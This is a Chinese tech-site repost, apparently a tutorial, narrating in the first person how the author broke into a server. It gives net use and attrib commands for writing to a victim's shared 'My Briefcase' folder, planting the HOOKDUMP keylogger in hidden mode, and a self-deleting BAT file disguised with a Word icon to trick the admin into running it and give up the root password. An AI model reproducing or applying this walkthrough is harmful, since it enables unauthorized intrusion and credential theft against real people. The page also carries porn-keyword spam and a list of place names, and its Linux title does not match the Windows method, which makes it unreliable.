亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

黑客如何入侵Linux系統

發布時間:2021-10-14 16:09:15 來源:億速云 閱讀:146 作者:小新 欄目:系統運維

小編給大家分享一下黑客如何入侵Linux系統,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

我發現了一個網站,于是常規入侵。很好,它的FINGER開著,于是我編了一個SHELL,aaa帳號試到zzz(by the way,這是我發現的一個網上規律,那就是帳號的長度與口令的強度成正比,如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個帳號也不存在,我沒有再試它的帳號。因為我被它開的端口吸引住了,它開著WWW,我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在還是看看root的信息吧:
  finger root@xxx.xxx.xxx
  Login name: root In real life: system PRIVILEGED account
  Directory: / Shell: /bin/sh
  Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
  No Plan.
  root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?
  net view \202.xx.xx.xx
  Shared resources at \202.xx.xx.xx
  Sharename Type Comment
  x
  x
  我的公文包
  The command was completed successfully.
  在上網的機器上開著WINDOWS的“文件和打印機共享”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現在開了共享的目錄沒有一個是根目錄,連D驅的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個root還挺行的。“我的公文包”吸引了我的注意,這是一個用于將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的主頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公文包”的共享一般都是可寫的!
  那我再進去看看。
  >net use i: \202.xx.xx.xx
  >i:
  >echo asdf>temp.txt
  不錯,確實可寫。
  >del temp.txt
  不留痕跡——黑客的習慣。
  >dir/od/p
  看看都有些什么…… 倒數第二排那個是什么?“X月工作計劃.doc”!就是它了,既然是計劃就不可能寫完了就丟一邊,它肯定會再次打開它的——至少下個月寫計劃時要COPY一下:->
page
  該動手了,我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP,我覺得它挺好的,價錢實惠,量也足…… 對不起,說習慣了,應該是它不僅記錄下全部擊鍵,還記錄下打開或關掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計算機一樣詳細了。您要問那么多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號偵查對象,而一個root的機器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機會就少了……
  >copy hookdump.* i:
  補充一點:上傳前先編好它的hookdump.ini文件,置為隱藏方式運行,不然root一運行屏幕上蹦出一大窗口可就……。
  然后再在自己的機器上編一個同名的BAT文件:X月工作計劃.BAT
  >edit c:X月工作計劃.BAT
  @echo off
  hookdump
  attrib -h X月工作計劃.doc
  C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc
  attrib -h temp.bat
  del temp.pif
  del temp.bat
  看明白了吧?root運行了這個BAT文件實際上就是先運行木馬,再調用WINWORD文件打開它想開的這個文件,然后自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。
  這時你的C驅根目錄就有了這么一個BAT文件,它是一個方形的圖標,和那個WORD文件大相徑庭,root怎么會運行它呢?沒關系,在這個文件上點右鍵,點屬性,在“程序”欄選“更改圖標”不就行了嗎?WORD的圖標在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”,“退出時關閉”打上勾,這樣才能保證在運行時一點跡象也沒有。事實上這個 BAT文件變成了兩個,還有一個PIF文件就是它的圖標。
  把這兩個文件傳上去:
  >copy X月工作計劃.bat i:
  >copy X月工作計劃.pif i:
  然后把它的文件和自己的文件都藏起來:
  >attrib +h X月工作計劃.doc
  >attrib +h X月工作計劃.bat
  這樣,root的“公文包”里只剩下一個和原來一模一樣的WORD圖標,他做夢也沒想到這已變成了一個BAT文件。然后可以喘口氣了,讓我們靜靜的等……
  幾天后,我進入這個工作站,取下記錄下來的擊鍵記錄,找出root的口令,進入主機。

以上是“黑客如何入侵Linux系統”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

聊城市| 蓬安县| 大新县| 长兴县| 丰宁| 济宁市| 元朗区| 道真| 湘乡市| 肥西县| 积石山| 平潭县| 泽库县| 郧西县| 故城县| 金堂县| 五原县| 修文县| 温泉县| 康平县| 贵港市| 玛多县| 平泉县| 海盐县| 庆元县| 淮北市| 赤壁市| 孟津县| 象山县| 东乌珠穆沁旗| 甘泉县| 巫溪县| 丰都县| 太仓市| 克什克腾旗| 德兴市| 德清县| 翁牛特旗| 辉南县| 大关县| 芮城县|